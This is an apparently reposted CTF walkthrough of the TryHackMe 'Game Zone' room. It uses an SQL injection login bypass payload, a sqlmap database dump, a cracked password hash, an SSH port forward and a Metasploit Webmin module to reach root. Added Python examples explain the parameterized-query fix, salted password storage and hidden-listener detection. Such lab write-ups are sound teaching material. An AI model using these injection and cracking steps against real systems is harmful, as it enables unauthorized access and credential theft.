[Tut] TryHackMe – Game Zone Walkthrough
[Tut] TryHackMe – Game Zone Walkthrough - xSicKxBot - 01-20-2023
<div>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tryhackme-game-zone-walkthrough/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2F9VbXoi9heZM%2Fhqdefault.jpg" alt="YouTube Video"></a></figure>
<h2>CHALLENGE OVERVIEW</h2>
<ul>
<li><strong>Link</strong>: <a href="https://tryhackme.com/room/gamezone" target="_blank" rel="noreferrer noopener">https://tryhackme.com/room/gamezone</a></li>
<li><strong>Difficulty</strong>: Easy</li>
<li><strong>Target</strong>: user and root flags on a Linux server</li>
<li><strong>Highlights</strong>: leveraging port forwarding to expose a web service from behind a firewall, using <code>sqlmap</code> to find a username and hashed password</li>
<li><strong>Tools used</strong>: <code>sqlmap</code>, <code>nmap</code>, <code>dirb</code>, <code>burpsuite</code>, <code>hydra</code>, <code>john the ripper</code>, <code>metasploit</code></li>
<li><strong>Tags</strong>: <em>sqli, hashcracking, metasploit, ssh tunnel</em></li>
</ul>
<div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://blog.finxter.com/wp-content/uploads/2023/01/image-206-1024x372.png" alt=""></figure></div>
<h2>BACKGROUND</h2>
<div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://blog.finxter.com/wp-content/uploads/2023/01/image-215-1024x684.png" alt=""></figure></div>
<p>In this Linux capture-the-flag (CTF) challenge we are tasked with hacking into a game review website’s server and finding a way to gain root privileges. Let’s go!</p>
<h2>IPs</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">export targetIP=10.10.163.79
export myIP=10.6.2.23</pre>
<h2>ENUMERATION/RECON</h2>
<div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://blog.finxter.com/wp-content/uploads/2023/01/image-216-1024x682.png" alt=""></figure></div>
<p>Let’s kick things off with our standard <code>nmap</code> and <code>dirb</code> scans. We’ll let these run while we go ahead and walk the website looking for interesting leads.</p>
<p>To find the character’s name on the main page, we can do a reverse image search on Google.
I’ve played this title before but forgot his name, so I just googled “<em>hitman game character name</em>” to find the answer to our first question. (agent 47)</p>
<h2>NMAP SCAN RESULTS</h2>
<div class="wp-block-image"><figure class="aligncenter size-full"><img src="https://blog.finxter.com/wp-content/uploads/2023/01/image-207.png" alt=""></figure></div>
<h2>DIRB SCAN RESULTS</h2>
<div class="wp-block-image"><figure class="aligncenter size-full"><img src="https://blog.finxter.com/wp-content/uploads/2023/01/image-208.png" alt=""></figure></div>
<h2>WALK THE WEBSITE</h2>
<p>We see a login portal on the landing page of our target IP.
We also look at the <code>/images</code> folder that <code>dirb</code> found, but nothing remarkable is there at first glance.</p>
<div class="wp-block-image"><figure class="aligncenter size-full"><img src="https://blog.finxter.com/wp-content/uploads/2023/01/image-209.png" alt=""></figure></div>
<p>Because the login form does not sanitize (or parameterize) its input, the login can be bypassed by entering the following as the username and leaving the password blank:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">' or 1=1 -- -</pre>
<p>The login trick works, and we are presented with a search box.</p>
<div class="wp-block-image"><figure class="aligncenter size-full"><img src="https://blog.finxter.com/wp-content/uploads/2023/01/image-210.png" alt=""></figure></div>
<h2>INITIAL FOOTHOLD – INTERCEPT A POST REQUEST WITH BURP</h2>
<div class="wp-block-image"><figure class="aligncenter size-full"><img src="https://blog.finxter.com/wp-content/uploads/2023/01/image-218.png" alt=""></figure></div>
<p>Let’s fire up <code>burpsuite</code> now to intercept an HTTP POST request made with this search box.</p>
<p>Intercepted HTTP POST request:</p>
<pre class="wp-block-preformatted"><code>POST /portal.php HTTP/1.1
Host: 10.10.134.32
Content-Length: 17
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.134.32
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.134.32/portal.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=v82et4dbp2fsr264tqhipmr1k5
Connection: close

searchitem=hitman</code></pre>
<p>We’ll save this request in a file titled <code>req</code>.</p>
<p>If you use <code>burpsuite</code> to capture the request, you can directly download it as a file. A word of caution: using Firefox developer mode to intercept and save the request saved it double-spaced for some reason, and I suspect the formatting caused it to screw up the <code>sqlmap</code> command.
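</p>
<p>To see why that username gets past the login, here is an added example (not code from the Game Zone site or from this write-up): a toy login written two ways, once by gluing the input into the SQL string and once as a parameterized query. It uses Python’s <code>sqlite3</code> in place of the portal’s PHP/MySQL, and the table, the <code>agent47</code> row and the <code>constructed-secret</code> password are all constructed. The search box that <code>sqlmap</code> works on in the next section is the same weakness, and the same fix applies to it.</p>

```python
"""Why the username  ' or 1=1 -- -  bypasses the login, and the fix.

Added example, not the Game Zone site's code. The real portal is PHP/MySQL;
sqlite3 is used so it runs offline. In MySQL the comment marker needs a
trailing space, hence the payload's '-- -'; SQLite treats '--' as a comment
either way, so the same payload behaves the same here.
"""
import hashlib
import sqlite3

PAYLOAD = "' or 1=1 -- -"  # the username entered on the login page in the write-up


def make_db() -> sqlite3.Connection:
    """Constructed users table with the two columns sqlmap later dumped (pwd, username)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    # Constructed credential; the stored value is an unsalted SHA-256 hex digest, like the dump.
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("agent47", hashlib.sha256(b"constructed-secret").hexdigest()))
    db.commit()
    return db


def vulnerable_query(username: str, pwd_hash: str) -> str:
    """Builds the SQL by string concatenation: the user's input becomes SQL syntax."""
    return (f"SELECT username FROM users WHERE username = '{username}' "
            f"AND pwd = '{pwd_hash}'")


def login_vulnerable(db: sqlite3.Connection, username: str, password: str) -> bool:
    """With PAYLOAD as the username the WHERE clause becomes  username = '' or 1=1 -- ...
    The comment swallows the password check, so any password (even none) succeeds."""
    pwd_hash = hashlib.sha256(password.encode()).hexdigest()
    return db.execute(vulnerable_query(username, pwd_hash)).fetchone() is not None


def login_safe(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterized query: the driver sends the input as data, never as SQL text.
    The quote and the comment marker are just characters in a username that does not exist."""
    pwd_hash = hashlib.sha256(password.encode()).hexdigest()
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND pwd = ?",
        (username, pwd_hash),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_query(PAYLOAD, "<hash of empty password>"))
    print("string-built login, payload + empty password:", login_vulnerable(db, PAYLOAD, ""))
    print("parameterized login, same input:            ", login_safe(db, PAYLOAD, ""))
    print("parameterized login, real credential:       ",
          login_safe(db, "agent47", "constructed-secret"))
```

<p>The printed query makes the mechanism visible: everything after <code>--</code> is discarded by the database, so the <code>AND pwd = ...</code> condition never runs. The parameterized version needs no blacklist of quotes or comment markers, which is why it is the fix to reach for rather than “sanitization”.</p>
<p>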
</p>
<h2>USING SQLMAP TO EXTRACT THE FULL DATABASE</h2>
<div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://blog.finxter.com/wp-content/uploads/2023/01/image-217-1024x684.png" alt=""></figure></div>
<p>With the following command, we can instruct <code>sqlmap</code> to replay the saved request, attempt to download (dump) the entire database, and look for a login username and hashed password.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">sqlmap -r req --dbms=mysql --dump --level 5</pre>
<p>It worked! We see that the database stores a list of game titles and reviews.</p>
<p>The most interesting piece of information here is the password. It looks like a hashed password.
We can use an online hash identifier program like hashes.com to find out the hash type.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">+------------------------------------------------------------------+----------+
| pwd                                                              | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47  |
+------------------------------------------------------------------+----------+</pre>
<div class="wp-block-image"><figure class="aligncenter size-full"><img src="https://blog.finxter.com/wp-content/uploads/2023/01/image-211.png" alt=""></figure></div>
<p>We can see that it is probably a SHA-256 hash.
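</p>
<p>What an identifier like hashes.com keys on, and what <code>john</code> is about to do, in an added example (not part of the original write-up): the guess rests purely on the digest’s format, a 64-character hex string with no salt and no scheme prefix, and cracking is a dictionary of candidates hashed one by one and compared. The short word list standing in for <code>rockyou.txt</code> is constructed; the PBKDF2 storage at the end is what the site should have used so that a dumped table is not instantly reversible.</p>

```python
"""Hash identification, dictionary check, and the defender's alternative.

Added example, not from the write-up. DUMPED_HASH is the value shown in the
sqlmap dump above; WORDLIST is a constructed stand-in for rockyou.txt.
"""
import hashlib
import hmac
import os
import re
from typing import Iterable, Optional

DUMPED_HASH = "ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14"

# Constructed mini word list so the example runs offline (not the real rockyou.txt).
WORDLIST = ["password", "123456", "letmein", "hitman47", "videogamer124", "qwerty"]

# Digest length in hex characters -> unsalted algorithm that produces it.
HEX_LENGTHS = {32: "MD5", 40: "SHA-1", 64: "SHA-256", 96: "SHA-384", 128: "SHA-512"}


def identify_hash(value: str) -> Optional[str]:
    """Guess the algorithm from format alone, as a hash identifier does.

    A raw digest only exposes its length and character set. Salted, iterated
    schemes (bcrypt, sha512crypt, PBKDF2) announce themselves with a prefix,
    which is also the first thing a defender wants to see in a dumped table.
    """
    value = value.strip()
    if re.fullmatch(r"[0-9a-fA-F]+", value):
        return HEX_LENGTHS.get(len(value))
    if value.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt"
    if value.startswith("$6$"):
        return "sha512crypt"
    if value.startswith("pbkdf2_sha256$"):
        return "PBKDF2-SHA256"
    return None


def dictionary_check(target_hex: str, words: Iterable[str], algo: str = "sha256") -> Optional[str]:
    """What john --format=Raw-SHA256 does: hash each candidate and compare with the target."""
    target_hex = target_hex.lower()
    for word in words:
        if hashlib.new(algo, word.encode()).hexdigest() == target_hex:
            return word
    return None


# The defender's side: salted and iterated, so one guess costs 600,000 SHA-256
# computations and a precomputed table is useless because every user has a different salt.
PBKDF2_ITERATIONS = 600_000


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Storage format: pbkdf2_sha256$iterations$salt_hex$digest_hex (salt is random per user)."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    scheme, iterations, salt_hex, digest_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print("dumped hash looks like:", identify_hash(DUMPED_HASH))
    print("dictionary hit:", dictionary_check(DUMPED_HASH, WORDLIST))
    stored = hash_password("videogamer124")
    print("same password stored properly:", stored[:48] + "...")
    print("identified as:", identify_hash(stored))
```

<p>Running it reproduces the identification step (64 hex characters, so SHA-256 is the natural guess) and the dictionary hit that <code>john</code> finds below. The contrast with the PBKDF2 form is the point for whoever owns the site: the dump would still leak, but each candidate password would cost 600,000 hash computations per user instead of one, and no two users could be attacked with the same precomputed list.</p>
<p>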
Now it’s time to …</p>
<h2>CRACK THAT HASH WITH JOHN (THE RIPPER)!</h2>
<div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://blog.finxter.com/wp-content/uploads/2023/01/image-219-1024x682.png" alt=""></figure></div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">john hash.txt --wordlist=/home/kalisurfer/hacking-tools/rockyou.txt --format=Raw-SHA256</pre>
<p><code>rockyou.txt</code> is a legendary leaked list of passwords (14,344,391 passwords!).</p>
<p>Output:</p>
<pre class="wp-block-preformatted"><code>Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 512/512 AVX512BW 16x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
videogamer124    (?)
1g 0:00:00:00 DONE (2023-01-14 12:23) 1.449g/s 4369Kp/s 4369Kc/s 4369KC/s vimivera..tyler912
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed</code></pre>
<h2>SSH INTO THE BOX AND GRAB THE USER FLAG</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">ssh agent47@$targetIP</pre>
<p>We are in!</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">agent47@gamezone:~$ cat user.txt
64----digits omitted----5c</pre>
<h2>PRIVILEGE ESCALATION</h2>
<p>This box requires a two-step process: port forwarding via ssh, and then throwing a reverse meterpreter shell to a listener.</p>
<p>Let’s check for hidden services running on ports that may be behind a firewall. We can use the <code>ss</code> utility to list the listening sockets on our target machine (<code>-t</code> TCP, <code>-u</code> UDP, <code>-l</code> listening sockets only, <code>-p</code> owning process, <code>-n</code> numeric ports).</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">agent47@gamezone:~$ ss -t -u -l -p -n</pre>
<p>Output:</p>
<pre class="wp-block-preformatted"><code>Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port
udp   UNCONN 0      0      *:10000            *:*</code></pre>
<p>This first line is curious. It appears that a service is running on port 10000 of the target system.</p>
<p>Let’s go ahead and port forward to see what is lying behind the firewall.
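</p>
<p>As an added example (not from the write-up), the same check from the defender’s chair: parse the <code>ss</code> listing, compare it with the ports an external scan reported, and flag every service that is reachable only from the host itself. The output block is constructed in the layout of <code>ss -t -u -l -p -n</code>; only the <code>*:10000</code> line comes from the page, and the <code>{22, 80}</code> set of externally visible ports is an assumption, since the nmap results appear above only as a screenshot.</p>

```python
"""Find services a host exposes only locally, from `ss` output.

Added example, not from the write-up. The `*:10000` row is the one the page
shows; the other rows and the EXTERNALLY_OPEN set are constructed/assumed.
"""
from typing import Iterable, List, NamedTuple, Set, Tuple


class Listener(NamedTuple):
    proto: str
    state: str
    addr: str
    port: int


# Constructed sample in the column layout of `ss -t -u -l -p -n`.
SS_OUTPUT = """\
Netid State  Recv-Q Send-Q   Local Address:Port   Peer Address:Port
udp   UNCONN 0      0                  *:10000             *:*
tcp   LISTEN 0      128                *:22                *:*
tcp   LISTEN 0      128                *:80                *:*
tcp   LISTEN 0      80         127.0.0.1:3306              *:*
"""

# Ports the external nmap scan showed as open (assumed: 22 and 80 are the two
# services the walkthrough itself uses from the outside).
EXTERNALLY_OPEN: Set[int] = {22, 80}

LOOPBACK = {"127.0.0.1", "::1", "[::1]"}


def parse_ss(text: str) -> List[Listener]:
    """Parse the data rows; the header row is skipped and malformed rows are ignored."""
    listeners: List[Listener] = []
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 5:
            continue
        # rpartition on the last ':' keeps IPv6 forms such as '[::]' intact.
        addr, _, port = fields[4].rpartition(":")
        if not port.isdigit():
            continue
        listeners.append(Listener(fields[0], fields[1], addr, int(port)))
    return listeners


def hidden_services(listeners: Iterable[Listener],
                    externally_open: Set[int]) -> List[Tuple[Listener, str]]:
    """Listeners whose port the outside scan never saw, with why they are unreachable.

    'loopback only' is a deliberate bind. 'filtered by firewall' means the socket
    accepts connections on every interface and only a packet filter keeps it off
    the network; that is the case for port 10000 in the write-up.
    """
    result: List[Tuple[Listener, str]] = []
    for listener in listeners:
        if listener.port in externally_open:
            continue
        reason = "loopback only" if listener.addr in LOOPBACK else "filtered by firewall"
        result.append((listener, reason))
    return result


if __name__ == "__main__":
    for listener, reason in hidden_services(parse_ss(SS_OUTPUT), EXTERNALLY_OPEN):
        print(f"{listener.proto}/{listener.port} on {listener.addr}: {reason}")
```

<p>Neither a firewall rule nor a loopback bind stops a user who already has a shell from reaching such a service through an SSH local forward (<code>ssh -L</code>), which is exactly the next step of the walkthrough. So a listener like port 10000 needs the same patching and authentication as an internet-facing one, and <code>AllowTcpForwarding no</code> in <code>sshd_config</code> removes the tunnel for accounts that have no business using it.</p>
<p>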
Port 10000 is typically used for server tools and configuration services.</p>
<h2>SET UP PORT FORWARD WITH SSH</h2>
<div class="wp-block-image"><figure class="aligncenter size-full"><img src="https://blog.finxter.com/wp-content/uploads/2023/01/image-220.png" alt=""></figure></div>
<p>The following command opens an ssh session and forwards local port 10000 to port 10000 on the target (<code>-L local_port:destination:remote_port</code>, with the destination resolved from the target’s point of view):</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">ssh -L 10000:localhost:10000 agent47@$targetIP
password: ---cracked-password---
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

109 packages can be updated.
68 updates are security updates.

Last login: Sat Jan 14 18:21:17 2023 from 10.6.2.23
agent47@gamezone:~$ </pre>
<p>We are connected now with port forwarding in place. Let’s navigate in our browser to <code>http://$targetIP:10000</code></p>
<p>After logging in with the same <code>username:password</code> combination we used with <code>ssh</code>, we are given access to a webmin portal.</p>
<h2>PRIVESC WITH METASPLOIT</h2>
<div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://blog.finxter.com/wp-content/uploads/2023/01/image-221-1024x682.png" alt=""></figure></div>
<p>Searching for <code>webmin</code> in Metasploit brings up the following Metasploit module.</p>
<p>Let’s use it and set it up with the following options:</p>
<div class="wp-block-image"><figure class="aligncenter size-full"><img src="https://blog.finxter.com/wp-content/uploads/2023/01/image-212.png" alt=""></figure></div>
<p>Let it rip!</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">run</pre>
<p>And it connects us to a shell. We can use the following command to interact with the meterpreter on session 0.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">sessions -i 0</pre>
<div class="wp-block-image"><figure class="aligncenter size-full"><img src="https://blog.finxter.com/wp-content/uploads/2023/01/image-213.png" alt=""></figure></div>
<p>And we now have our root flag! Thanks for reading this write-up.</p>
</div>
https://www.sickgaming.net/blog/2023/01/19/tryhackme-game-zone-walkthrough/